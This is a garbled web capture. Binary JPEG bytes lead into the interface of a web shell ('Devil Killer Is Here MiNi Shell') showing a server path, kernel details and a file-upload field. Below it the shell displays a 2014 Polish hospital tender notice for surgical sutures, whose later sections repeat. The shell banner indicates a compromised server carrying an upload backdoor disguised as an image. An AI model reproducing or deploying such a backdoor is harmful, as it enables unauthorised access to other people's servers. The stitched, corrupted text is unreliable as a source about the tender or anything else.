JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140117/11191-N-2014.html

<p class="kh_header"><b>Wrocław: PN  6/14  - przetarg na dostawę materiałów szewnych</b><br>
<b>Numer ogłoszenia: 11191 - 2014; data zamieszczenia: 17.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. J. Gromkowskiego , ul. Koszarowa 5, 51-149 Wrocław, woj. dolnośląskie, tel. 071 3261325 w. 128, faks 071 3260622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gromkowski.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN  6/14  - przetarg na dostawę materiałów szewnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych  - zgodnie z zestawieniem  - załącznik nr 1a-f
   

Dostarczane  przedmioty zamowienia    muszą   posiadać w  momencie  dostarczenia do apteki szpitala   minimum 12 miesięczny okres  przydatności  do użycia.  Wykonawca dostarczy przedmiot zamówienia do  magazynu  Apteki ( budynek C). Termin dostawy przedmiotów zamówienia - wg bieżących potrzeb, każdorazowo w ciągu max 72 godzin od daty złożenia zamówienia.
Zamawiający wymaga aby:
  1) Nici były pakowane w sterylne, podwójnie szczelnie zamknięte saszetki - folia - papier i folia aluminiowa, gąbka  hemostatyczna w opakowaniu sterylnym
    2) Saszetki nici były opisane co do rodzaju nici w języku polskim
   3) Wymaga się w celu sprawdzenia spełnienia wymogów SIWZ - katalogu w języku polskim z opisem rodzaju proponowanych szwów oraz opisem graficznym igieł.
   4) Data ważności i seria na fakturze, faktura na nośniku magnetycznym (dyskietka, CD, pendrive) lub na adres e-mailowy kierownika Apteki, który zostanie podany na zyczenie Wykonawcy ktory uzyska zamówienie, po zakończonej procedurze przetargowej.
  5) Termin przydatności towaru do użytku nie może być krótszy niż 12 
 6) Wymaga się igieł silikonizowanych a na potwierdzenie powyższego - deklaracji producenta o powleczeniu

Zamawiający zastrzega sobie mozliwość wezwania Oferenta w razie wątpliwości, że zaoferowany produkt nie spełnia wymogów SIWZ, do dostarczenia bezzwrotnych próbek po 1 saszetce



Próbki przekazane do testowania muszą być opakowane w jednostkowe opakowania handlowe zawierające informacje wymagane przepisami rozporządzenia w sprawie wymagań zasadniczych do wyrobów medycznych do różnego przeznaczenia.
W przypadku jednostkowego opakowania, do każdej  próbki należy dołączyć kserokopię etykiety znajdującej się na opakowaniu handlowym. Każda próbka opatrzona będzie etykietą zawierającą wszystkie dane zaoferowanego produktu, opis w j. polskim.

Wszystkie przedmioty zamówienia muszą być dopuszczone do obrotu na rynku polskim,zgodnie z przepisami prawa i posiadać odpowiednie dokumenty rejestracyjne potwierdzające ten fakt.
Zaoferowany przez Wykonawcę przedmiot zamówienia w zakresie opakowań, oznaczenia oraz obrotu odpowiadają wymaganiom ustawy o wyrobach medycznych z dn. 20 maja 2010r. (Dz.U. Z 2010r. Nr 107 poz 679.
Zamówienie wykonywane będzie w okresach kolejnych 12 miesięcy.

Oferowane przedmioty zamówienia muszą być dopuszczone do obrotu na terenie RP i UE.

Data ważności i numer serii musi być oznaczona na opakowaniu każdego przedmiotu zamówienia 
Data ważności i numer serii muszą być naniesione na fakturę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7, 33.14.11.25-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania  - jeżeli jest  wymagane   zezwolenie  na prowadzenie obrotu  wyrobami  medycznymi , o ile  ich   sprzedaż wymaga  posiadania  takiego zezwolenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą, się wykonaniem lub wykonywaniem co najmniej dwóch głównych dostaw  -zgodnie z przedmiotem zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie, o łącznej  wartości minimum: 

dla zadania nr 1: 100 000,00 PLN    
dla zadania nr 2: 10 000,00 PLN
dla zadania nr 3: 10 000,00 PLN
dla zadania nr 4: 50 000.00 PLN
dla zadania nr 5: 30 000,00 PLN
dla zadania nr 6: 5 000,00 PLN</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 200.000,00zł PLN odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W odniesieniu do wyrobów medycznych tj. :Oświadczenie o posiadaniu wymaganych ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz.U. z 2010 r. nr 107, poz. 679 z późn. zm.) dokumentów dopuszczających oferowane wyroby medyczne do obrotu oraz zobowiązanie do ich dostarczenia na każde żądanie Zamawiającego - załącznik nr 5 do SIWZ. 
Wymagane oświadczenie dotyczy wyrobów medycznych. W przypadku,kiedy dany produkt nie jest wyrobem medycznym i nie podlega przepisom ustawy z dnia 20 mają 2010 r. o wyrobach medycznych ani dyrektywie europejskiej 93/42/EEC, Zamawiający wymaga złożenia oświadczenia, iż dokumenty te nie są wymagane 	(wymieniając w oświadczeniu, iż dany produkt nie jest wyrobem medycznym) - załącznik nr 5 do SIWZ.
        c) deklaracja zgodności;   
 d)  szczegółowy opis oferowanych produktów (katalog lub folder ) - zawierający szczegółową charakterystykę  wyrobów  potwierdzający , że zaoferowane produkty są zgodne z opisem przedmiotu zamówienia , nazwę producenta, nazwę produktu lub nr-u katalogowego, tak by możliwa była ich identyfikacja. W przypadku,  oryginalny  katalog (folder) producenta  jest w innym języku niż język polski , prosimy o dołączenie tłumaczenia folderu oferowanego wyrobu . W przypadku , gdyby załączone  do oferty katalogi (foldery)  nie prezentowały identycznego produktu jak oferowany  należy tę rozbieżność  wskazać i oświadczyć , czy zaoferowany produkt spełnia wymogi określone w SIWZ
e) Deklarację producenta o powleczeniu na potwierdzenie, iż oferowane igły są silikonizowane.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmiany umowy w następujących przypadkach:
              1)   zaprzestania produkcji przez producenta i wprowadzenia asortymentu zamiennego, w cenie nie 	wyższej niż zaoferowana w przetargu i pod warunkiem przesłania próbek nowego asortymentu   	do Zamawiającego w celu potwierdzenia, że nowy asortyment spełnia wymagania 	zamawiającego.
2) zmiany postanowień zawartej umowy, w przypadku gdy Wykonawca, którego oferta została wybrana, zaoferuje ceny zakupu przedmiotów zamówienia, korzystniejsze niż zaoferował w ofercie, która została wybrana jako najkorzystniejsza.
3) Dopuszczalne jest obniżenie wynagrodzenia wykonawcy przy zachowaniu zakresu jego świadczenia umownego.
4) Ponadto dopuszcza się zmiany w zakresie:
a) nazwy produktu przy zachowaniu jego parametrów,
b) sposobu konfekcjonowania,
c) liczbie opakowań zbiorczych
d) wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
5)  Dopuszczalne jest wydłużenie terminu wykonania umowy w przypadku nieezrealizowania całej wartości umowy.
6) Ceny podane w ofercie mogą ulec zmianie w trakcie trwania umowy, jedynie w przypadku zmiany stawki VAT, gdy nie można ich było przewidzieć wcześniej.
7) Dopuszczalne jest wydłużenie czasu trwania umowy w sytuacji niewykorzystania przez zamawiającego przedmiotu umowy przy zachowaniu jej wartości
8) zmiany cen urzędowych przedmiotu umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. J. Gromkowskiego, ul. Koszarowa 5, 51-149 Wrocław, budynek J, I piętro, pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2014 godzina 09:00, miejsce: Wojewódzki Szpital Specjalistyczny im. J. Gromkowskiego, ul. Koszarowa 5, 51-149 Wrocław, budynek J, I piętro, pokój nr 15....</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nr postępowania  PN  6/14  - przetarg na dostawę materiałów szewnych -zadanie nr 1-szwy chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych  - zgodnie z zestawieniem  - załącznik nr 1a
   

Dostarczane  przedmioty zamowienia    muszą   posiadać w  momencie  dostarczenia do apteki szpitala   minimum 12 miesięczny okres  przydatności  do użycia.  Wykonawca dostarczy przedmiot zamówienia do  magazynu  Apteki ( budynek C). Termin dostawy przedmiotów zamówienia - wg bieżących potrzeb, każdorazowo w ciągu max 72 godzin od daty złożenia zamówienia.
Zamawiający wymaga aby:
  1) Nici były pakowane w sterylne, podwójnie szczelnie zamknięte saszetki - folia - papier i folia aluminiowa, gąbka  hemostatyczna w opakowaniu sterylnym
    2) Saszetki nici były opisane co do rodzaju nici w języku polskim
   3) Wymaga się w celu sprawdzenia spełnienia wymogów SIWZ - katalogu w języku polskim z opisem rodzaju proponowanych szwów oraz opisem graficznym igieł.
   4) Data ważności i seria na fakturze, faktura na nośniku magnetycznym (dyskietka, CD, pendrive) lub na adres e-mailowy kierownika Apteki, który zostanie podany na zyczenie Wykonawcy ktory uzyska zamówienie, po zakończonej procedurze przetargowej.
  5) Termin przydatności towaru do użytku nie może być krótszy niż 12 
 6) Wymaga się igieł silikonizowanych a na potwierdzenie powyższego - deklaracji producenta o powleczeniu

Zamawiający zastrzega sobie mozliwość wezwania Oferenta w razie wątpliwości, że zaoferowany produkt nie spełnia wymogów SIWZ, do dostarczenia bezzwrotnych próbek po 1 saszetce



Próbki przekazane do testowania muszą być opakowane w jednostkowe opakowania handlowe zawierające informacje wymagane przepisami rozporządzenia w sprawie wymagań zasadniczych do wyrobów medycznych do różnego przeznaczenia.
W przypadku jednostkowego opakowania, do każdej  próbki należy dołączyć kserokopię etykiety znajdującej się na opakowaniu handlowym. Każda próbka opatrzona będzie etykietą zawierającą wszystkie dane zaoferowanego produktu, opis w j. polskim.

Wszystkie przedmioty zamówienia muszą być dopuszczone do obrotu na rynku polskim,zgodnie z przepisami prawa i posiadać odpowiednie dokumenty rejestracyjne potwierdzające ten fakt.
Zaoferowany przez Wykonawcę przedmiot zamówienia w zakresie opakowań, oznaczenia oraz obrotu odpowiadają wymaganiom ustawy o wyrobach medycznych z dn. 20 maja 2010r. (Dz.U. Z 2010r. Nr 107 poz 679.
Zamówienie wykonywane będzie w okresach kolejnych 12 miesięcy.

Oferowane przedmioty zamówienia muszą być dopuszczone do obrotu na terenie RP i UE.

Data ważności i numer serii musi być oznaczona na opakowaniu każdego przedmiotu zamówienia 
Data ważności i numer serii muszą być naniesione na fakturę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PN  6/14  - przetarg na dostawę materiałów szewnych -zadanie nr 2-szwy chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych  - zgodnie z zestawieniem  - załącznik nr 1b
   

Dostarczane  przedmioty zamowienia    muszą   posiadać w  momencie  dostarczenia do apteki szpitala   minimum 12 miesięczny okres  przydatności  do użycia.  Wykonawca dostarczy przedmiot zamówienia do  magazynu  Apteki ( budynek C). Termin dostawy przedmiotów zamówienia - wg bieżących potrzeb, każdorazowo w ciągu max 72 godzin od daty złożenia zamówienia.
Zamawiający wymaga aby:
  1) Nici były pakowane w sterylne, podwójnie szczelnie zamknięte saszetki - folia - papier i folia aluminiowa, gąbka  hemostatyczna w opakowaniu sterylnym
    2) Saszetki nici były opisane co do rodzaju nici w języku polskim
   3) Wymaga się w celu sprawdzenia spełnienia wymogów SIWZ - katalogu w języku polskim z opisem rodzaju proponowanych szwów oraz opisem graficznym igieł.
   4) Data ważności i seria na fakturze, faktura na nośniku magnetycznym (dyskietka, CD, pendrive) lub na adres e-mailowy kierownika Apteki, który zostanie podany na zyczenie Wykonawcy ktory uzyska zamówienie, po zakończonej procedurze przetargowej.
  5) Termin przydatności towaru do użytku nie może być krótszy niż 12 
 6) Wymaga się igieł silikonizowanych a na potwierdzenie powyższego - deklaracji producenta o powleczeniu

Zamawiający zastrzega sobie mozliwość wezwania Oferenta w razie wątpliwości, że zaoferowany produkt nie spełnia wymogów SIWZ, do dostarczenia bezzwrotnych próbek po 1 saszetce



Próbki przekazane do testowania muszą być opakowane w jednostkowe opakowania handlowe zawierające informacje wymagane przepisami rozporządzenia w sprawie wymagań zasadniczych do wyrobów medycznych do różnego przeznaczenia.
W przypadku jednostkowego opakowania, do każdej  próbki należy dołączyć kserokopię etykiety znajdującej się na opakowaniu handlowym. Każda próbka opatrzona będzie etykietą zawierającą wszystkie dane zaoferowanego produktu, opis w j. polskim.

